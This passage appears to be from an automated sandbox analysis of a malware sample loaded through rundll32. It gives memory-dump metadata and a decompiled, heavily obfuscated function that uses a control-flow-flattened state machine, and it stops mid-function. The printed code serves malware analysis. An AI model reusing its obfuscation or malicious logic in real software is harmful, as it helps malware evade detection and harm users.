                                                                                                                      0x00695b2d
                                                                                                                      0x00695a50
                                                                                                                      0x00695a56
                                                                                                                      0x00000000
                                                                                                                      0x00695a5c
                                                                                                                      0x00695a6b
                                                                                                                      0x00695a70
                                                                                                                      0x00695a71
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00000000
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00695a56
                                                                                                                      0x00695a42
                                                                                                                      0x00695b3a
                                                                                                                      0x00695b3a
                                                                                                                      0x00695b3a
                                                                                                                      0x00695728
                                                                                                                      0x00695a20
                                                                                                                      0x00695a25
                                                                                                                      0x00695a26
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00000000
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00695734
                                                                                                                      0x006959ce
                                                                                                                      0x006959dc
                                                                                                                      0x006959e3
                                                                                                                      0x006959ee
                                                                                                                      0x006959f8
                                                                                                                      0x006959f9
                                                                                                                      0x006959fe
                                                                                                                      0x00695a01
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00000000
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00695740
                                                                                                                      0x00695948
                                                                                                                      0x0069597a
                                                                                                                      0x006959ad
                                                                                                                      0x006959b4
                                                                                                                      0x006959b9
                                                                                                                      0x006959bc
                                                                                                                      0x006959be
                                                                                                                      0x006959c4
                                                                                                                      0x00000000
                                                                                                                      0x006959c4
                                                                                                                      0x00695746
                                                                                                                      0x0069574c
                                                                                                                      0x0069584c
                                                                                                                      0x00695889
                                                                                                                      0x00695890
                                                                                                                      0x00695895
                                                                                                                      0x0069589e
                                                                                                                      0x006958e5
                                                                                                                      0x006958f4
                                                                                                                      0x00695918
                                                                                                                      0x0069591c
                                                                                                                      0x00695921
                                                                                                                      0x00695924
                                                                                                                      0x00695926
                                                                                                                      0x0069592c
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00000000
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00695752
                                                                                                                      0x00695758
                                                                                                                      0x006957f8
                                                                                                                      0x0069580d
                                                                                                                      0x00695812
                                                                                                                      0x00695817
                                                                                                                      0x0069581f
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00000000
                                                                                                                      0x00695717
                                                                                                                      0x0069575e
                                                                                                                      0x0069575e
                                                                                                                      0x00695760
                                                                                                                      0x00000000
                                                                                                                      0x00695766
                                                                                                                      0x00695766
                                                                                                                      0x0069576f
                                                                                                                      0x0069577a
                                                                                                                      0x00695780
                                                                                                                      0x006957ba
                                                                                                                      0x006957bf
                                                                                                                      0x006957d2
                                                                                                                      0x006957d7
                                                                                                                      0x006957d8
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00000000
                                                                                                                      0x00695717
                                                                                                                      0x00695717
                                                                                                                      0x00695760
                                                                                                                      0x00695758
                                                                                                                      0x0069574c
                                                                                                                      0x00000000
                                                                                                                      0x00695afa
                                                                                                                      0x00695afa
                                                                                                                      0x00695afa
                                                                                                                      0x00000000
                                                                                                                      0x0069571c

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$xO4$~wP`$!=$'$zQ5
                                                                                                                      • API String ID: 1514166925-4215140744
                                                                                                                      • Opcode ID: a2040f04defaf98b30c9f87c17561d0f4912f01a8fe5b98d204457386b609180
                                                                                                                      • Instruction ID: 0196672f47c3d37f76655ef73be526f54fd2990fa0c29bf44ca436bf3ca4d0f4
                                                                                                                      • Opcode Fuzzy Hash: a2040f04defaf98b30c9f87c17561d0f4912f01a8fe5b98d204457386b609180
                                                                                                                      • Instruction Fuzzy Hash: D87200714093819FD3B9CF65C58AB8BBBE1BBC4318F108A1DE1DA96260D7B48949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00692550 Relevance: 19.8, Strings: 15, Instructions: 1077COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00692550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
				_v576 = 0x767b63;
				_v576 = _v576 >> 3;
				_v576 = _v576 + 0xd487;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 ^ 0x00061026;
				_v628 = 0xe4759e;
				_v628 = _v628 ^ 0xa26bb658;
				_v628 = _v628 * 0x1d;
				_v628 = _v628 ^ 0xba259216;
				_v628 = _v628 ^ 0xd068fc76;
				_v500 = 0xe51d81;
				_v500 = _v500 >> 7;
				_v500 = _v500 + 0xc085;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 ^ 0x01113a52;
				_v512 = 0xc902c8;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 7;
				_v512 = _v512 ^ 0x0003c164;
				_v532 = 0xda62af;
				_v532 = _v532 ^ 0x7c695b99;
				_v532 = _v532 >> 0xd;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x0009f043;
				_v604 = 0x69f539;
				_v604 = _v604 << 0xd;
				_v604 = _v604 + 0xffffd530;
				_v604 = _v604 + 0xffffaf77;
				_v604 = _v604 ^ 0x3ead80db;
				_v384 = 0xab9f19;
				_t1195 = 0xf;
				_t1313 = 0x50;
				_v384 = _v384 * 0x15;
				_v384 = _v384 * 9;
				_v384 = _v384 ^ 0x7eb18135;
				_v256 = 0xb5a6bd;
				_v256 = _v256 | 0x1f71a96d;
				_v256 = _v256 ^ 0x1ffe1878;
				_v264 = 0xca80f7;
				_v264 = _v264 ^ 0x226a3f90;
				_v264 = _v264 ^ 0x22af4e12;
				_v432 = 0x1b5a57;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x8c1547fb;
				_v432 = _v432 ^ 0xed77fd98;
				_v312 = 0xf59d00;
				_v312 = _v312 | 0xee7978e1;
				_v312 = _v312 ^ 0xeef23383;
				_v608 = 0x388a49;
				_v608 = _v608 ^ 0x20b0147d;
				_v608 = _v608 | 0x120a0452;
				_v608 = _v608 / _t1195;
				_v608 = _v608 ^ 0x035d442e;
				_v632 = 0x8bfb5e;
				_v632 = _v632 / _t1313;
				_v632 = _v632 | 0x8005d6ab;
				_v632 = _v632 + 0xbf6f;
				_v632 = _v632 ^ 0x80035879;
				_v624 = 0xe5ec6;
				_v624 = _v624 << 2;
				_v624 = _v624 >> 9;
				_v624 = _v624 | 0xadaec6d6;
				_v624 = _v624 ^ 0xada90310;
				_v392 = 0x144ef;
				_t1196 = 0x44;
				_v392 = _v392 / _t1196;
				_v392 = _v392 + 0xc90b;
				_v392 = _v392 ^ 0x0000cf97;
				_v236 = 0xf3d10d;
				_t1197 = 0x4a;
				_v236 = _v236 * 0x7a;
				_v236 = _v236 ^ 0x74330487;
				_v324 = 0xc3c34b;
				_v324 = _v324 * 0x6c;
				_v324 = _v324 ^ 0x529af392;
				_v520 = 0x2a70ca;
				_v520 = _v520 / _t1197;
				_v520 = _v520 >> 4;
				_v520 = _v520 ^ 0x2a4d5a72;
				_v520 = _v520 ^ 0x2a4dbf28;
				_v340 = 0xc9c056;
				_t1198 = 7;
				_v340 = _v340 * 0x23;
				_v340 = _v340 | 0xe2238341;
				_v340 = _v340 ^ 0xfbb710ef;
				_v248 = 0x9a54c0;
				_v248 = _v248 | 0xe08ac880;
				_v248 = _v248 ^ 0xe09bcbd4;
				_v348 = 0xe0760;
				_v348 = _v348 << 7;
				_v348 = _v348 + 0x49a3;
				_v348 = _v348 ^ 0x070edb7d;
				_v356 = 0xf94015;
				_v356 = _v356 * 0x4d;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0x95f7b4be;
				_v320 = 0x1268a5;
				_v320 = _v320 / _t1198;
				_v320 = _v320 ^ 0x00080ceb;
				_v396 = 0xbdcf3e;
				_t1199 = 0x4b;
				_v396 = _v396 * 0x4d;
				_v396 = _v396 >> 2;
				_v396 = _v396 ^ 0x0e48dd39;
				_v596 = 0x7780dd;
				_v596 = _v596 << 0xd;
				_v596 = _v596 | 0xdff7e7fd;
				_v596 = _v596 ^ 0xfff000ad;
				_v492 = 0x5c66b3;
				_v492 = _v492 * 0x2a;
				_v492 = _v492 ^ 0xe8f32aee;
				_v492 = _v492 >> 0xd;
				_v492 = _v492 ^ 0x000eb956;
				_v316 = 0x3e4fae;
				_v316 = _v316 >> 3;
				_v316 = _v316 ^ 0x00075837;
				_v344 = 0xe0dcd8;
				_v344 = _v344 >> 1;
				_v344 = _v344 + 0xffff4400;
				_v344 = _v344 ^ 0x0066aca9;
				_v460 = 0xbe16e8;
				_v460 = _v460 * 0x45;
				_v460 = _v460 ^ 0x56f71a5b;
				_v460 = _v460 / _t1199;
				_v460 = _v460 ^ 0x0158823c;
				_v588 = 0x54b44f;
				_v588 = _v588 ^ 0xc5cf08f3;
				_v588 = _v588 ^ 0x4b1db793;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x00183ace;
				_v524 = 0xbfc9bb;
				_t1200 = 0x67;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 * 0x71;
				_v524 = _v524 << 1;
				_v524 = _v524 ^ 0xed1ab829;
				_v376 = 0x55c29;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0xdae248eb;
				_v376 = _v376 ^ 0x8f2c7d73;
				_v424 = 0x330008;
				_v424 = _v424 << 0xb;
				_v424 = _v424 / _t1200;
				_v424 = _v424 ^ 0x017d7462;
				_v580 = 0xb4c97;
				_v580 = _v580 | 0x569d8b1e;
				_v580 = _v580 >> 1;
				_t1201 = 3;
				_v580 = _v580 / _t1201;
				_v580 = _v580 ^ 0x0e68230a;
				_v328 = 0x695dff;
				_v328 = _v328 ^ 0x424f14af;
				_v328 = _v328 ^ 0x4224025c;
				_v284 = 0xae8351;
				_t1202 = 0x57;
				_v284 = _v284 * 0x60;
				_v284 = _v284 ^ 0x417e5081;
				_v444 = 0x78eba1;
				_v444 = _v444 * 0x5f;
				_v444 = _v444 ^ 0x00193e0b;
				_v444 = _v444 ^ 0x2cc98685;
				_v592 = 0x15a443;
				_v592 = _v592 / _t1202;
				_v592 = _v592 + 0xffff9c6f;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x07f20231;
				_v216 = 0x5d0672;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x02ee7d7e;
				_v548 = 0xb50861;
				_v548 = _v548 >> 0xc;
				_v548 = _v548 << 0xf;
				_v548 = _v548 + 0xffffef54;
				_v548 = _v548 ^ 0x05ac6923;
				_v452 = 0x2163b6;
				_v452 = _v452 | 0xbb60e7c3;
				_v452 = _v452 ^ 0x0d3b8c6d;
				_v452 = _v452 ^ 0xb65710e5;
				_v636 = 0x61f3a7;
				_v636 = _v636 + 0xffff300f;
				_v636 = _v636 << 1;
				_v636 = _v636 * 0x27;
				_v636 = _v636 ^ 0x1d9bc7e7;
				_v224 = 0x725254;
				_v224 = _v224 + 0xfffffac1;
				_v224 = _v224 ^ 0x007e9bc6;
				_v228 = 0xd6200c;
				_v228 = _v228 ^ 0x5ef32346;
				_v228 = _v228 ^ 0x5e2a0e2d;
				_v540 = 0xc12668;
				_v540 = _v540 << 8;
				_v540 = _v540 * 0x51;
				_v540 = _v540 + 0xffff6981;
				_v540 = _v540 ^ 0x1d2c502d;
				_v496 = 0x68726f;
				_v496 = _v496 + 0xb8c4;
				_v496 = _v496 + 0xffff3269;
				_v496 = _v496 << 1;
				_v496 = _v496 ^ 0x00d37668;
				_v296 = 0x65f16b;
				_v296 = _v296 ^ 0xac840f83;
				_v296 = _v296 ^ 0xace8f4ad;
				_v336 = 0xf34185;
				_v336 = _v336 + 0xffff7084;
				_v336 = _v336 ^ 0x22f89925;
				_v336 = _v336 ^ 0x2207d32f;
				_v400 = 0x9220b0;
				_v400 = _v400 | 0xa2c46701;
				_v400 = _v400 + 0x1a14;
				_v400 = _v400 ^ 0xa2d5ce26;
				_v368 = 0x18190f;
				_v368 = _v368 * 0x6c;
				_t1203 = 0x47;
				_v368 = _v368 * 0x49;
				_v368 = _v368 ^ 0xe62bbbec;
				_v276 = 0x664929;
				_v276 = _v276 + 0xffffab3c;
				_v276 = _v276 ^ 0x0066f8be;
				_v420 = 0x55fac4;
				_v420 = _v420 / _t1203;
				_v420 = _v420 | 0x23698c02;
				_v420 = _v420 ^ 0x23676b12;
				_v428 = 0x2d8f3d;
				_v428 = _v428 ^ 0xcbbc8554;
				_v428 = _v428 + 0xffff5f5b;
				_v428 = _v428 ^ 0xcb969d3b;
				_v408 = 0x7d0ed3;
				_t1204 = 0x33;
				_v408 = _v408 / _t1204;
				_v408 = _v408 ^ 0x03ccba73;
				_v408 = _v408 ^ 0x03c41a74;
				_v212 = 0xf1bcf;
				_v212 = _v212 | 0xafbe7d4b;
				_v212 = _v212 ^ 0xafbe5483;
				_v476 = 0x76a0ac;
				_v476 = _v476 << 0xa;
				_v476 = _v476 << 2;
				_v476 = _v476 >> 6;
				_v476 = _v476 ^ 0x01aadd1c;
				_v252 = 0xacd74c;
				_v252 = _v252 + 0xffffc13c;
				_v252 = _v252 ^ 0x00a0cd5e;
				_v232 = 0x48ff42;
				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E006966CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E00691FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E006A0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E006995FA();
									_t1122 = E00691FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E0069C110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E006859F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
							}
							__eflags = _t1317 - 0x3fc5519;
							if(_t1317 == 0x3fc5519) {
								_v144 = E006920B0();
								_t1125 = E00691DDD(_v452, _t1152, _v636, _v224);
								_pop(_t1237);
								_v140 = _t1125;
								_t1317 = 0xa74297b;
								continue;
							}
							__eflags = _t1317 - 0x42dc4f0;
							if(_t1317 == 0x42dc4f0) {
								_t1125 = _v468;
								_t1317 = 0x4cdd8ae;
								_v112 = _t1125;
								continue;
							}
							__eflags = _t1317 - 0x4a24b69;
							if(_t1317 == 0x4a24b69) {
								_t1125 = E00690326();
								_t1317 = 0x8690ed6;
								continue;
							}
							__eflags = _t1317 - 0x4cdd8ae;
							if(_t1317 != 0x4cdd8ae) {
								goto L109;
							}
							_t1125 = _v508;
							_t1317 = 0x5dcd6da;
							_v124 = _t1125;
							continue;
						}
						if(_t1349 == 0) {
							E00698519(_v244, _v352, _v188);
							L34:
							_t1317 = 0xe4333b3;
							continue;
						}
						_t1350 = _t1317 - 0x27d9d92;
						if(_t1350 > 0) {
							__eflags = _t1317 - 0x2a998d8;
							if(_t1317 == 0x2a998d8) {
								_t1124 = E00681A56( &_v180,  &_v84, _v572, _v516);
								__eflags = _t1124;
								if(_t1124 != 0) {
									_t1125 = _v28;
									__eflags = _t1125 - 8;
									if(_t1125 != 8) {
										__eflags = _t1125;
										if(_t1125 == 0) {
											L32:
											_t1317 = 0xa65551a;
											continue;
										}
										__eflags = _t1125 - 1;
										if(_t1125 != 1) {
											goto L27;
										}
										goto L32;
									}
									_t1317 = 0xc1a4fe5;
									continue;
								}
								_t1125 = E00690AE0(_v308, _v564);
								_pop(_t1237);
								_t1314 = _t1125;
								_t1191 = 0x5dcd6da;
								goto L27;
							}
							__eflags = _t1317 - 0x2cf0ed0;
							if(_t1317 == 0x2cf0ed0) {
								_t1125 = E0069CB5B(_v340, _v248, _v348, _v356);
								goto L114;
							}
							__eflags = _t1317 - 0x3250d84;
							if(__eflags == 0) {
								_v196 = E00697BA6( &_v192, _v596, __eflags, _v492, 0x681444);
								_v204 = E00697BA6( &_v200, _v316, __eflags, _v344, 0x6814b4);
								_t1130 = E00685361(_v460, _v524,  &_v196,  &_v204);
								_t1345 = _t1345 + 0x1c;
								asm("sbb esi, esi");
								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
								E0068A8B0(_v376, _v204, _v424);
								_t1125 = E0068A8B0(_v580, _v196, _v328);
								goto L109;
							}
							__eflags = _t1317 - 0x3ace1b1;
							if(_t1317 != 0x3ace1b1) {
								goto L109;
							}
							_t1125 = E0069473C();
							_t1317 = 0xc245297;
							continue;
						}
						if(_t1350 == 0) {
							_t1141 = E00694116();
							__eflags = _t1141;
							if(_t1141 == 0) {
								_t1125 = E00691FFB();
								asm("sbb esi, esi");
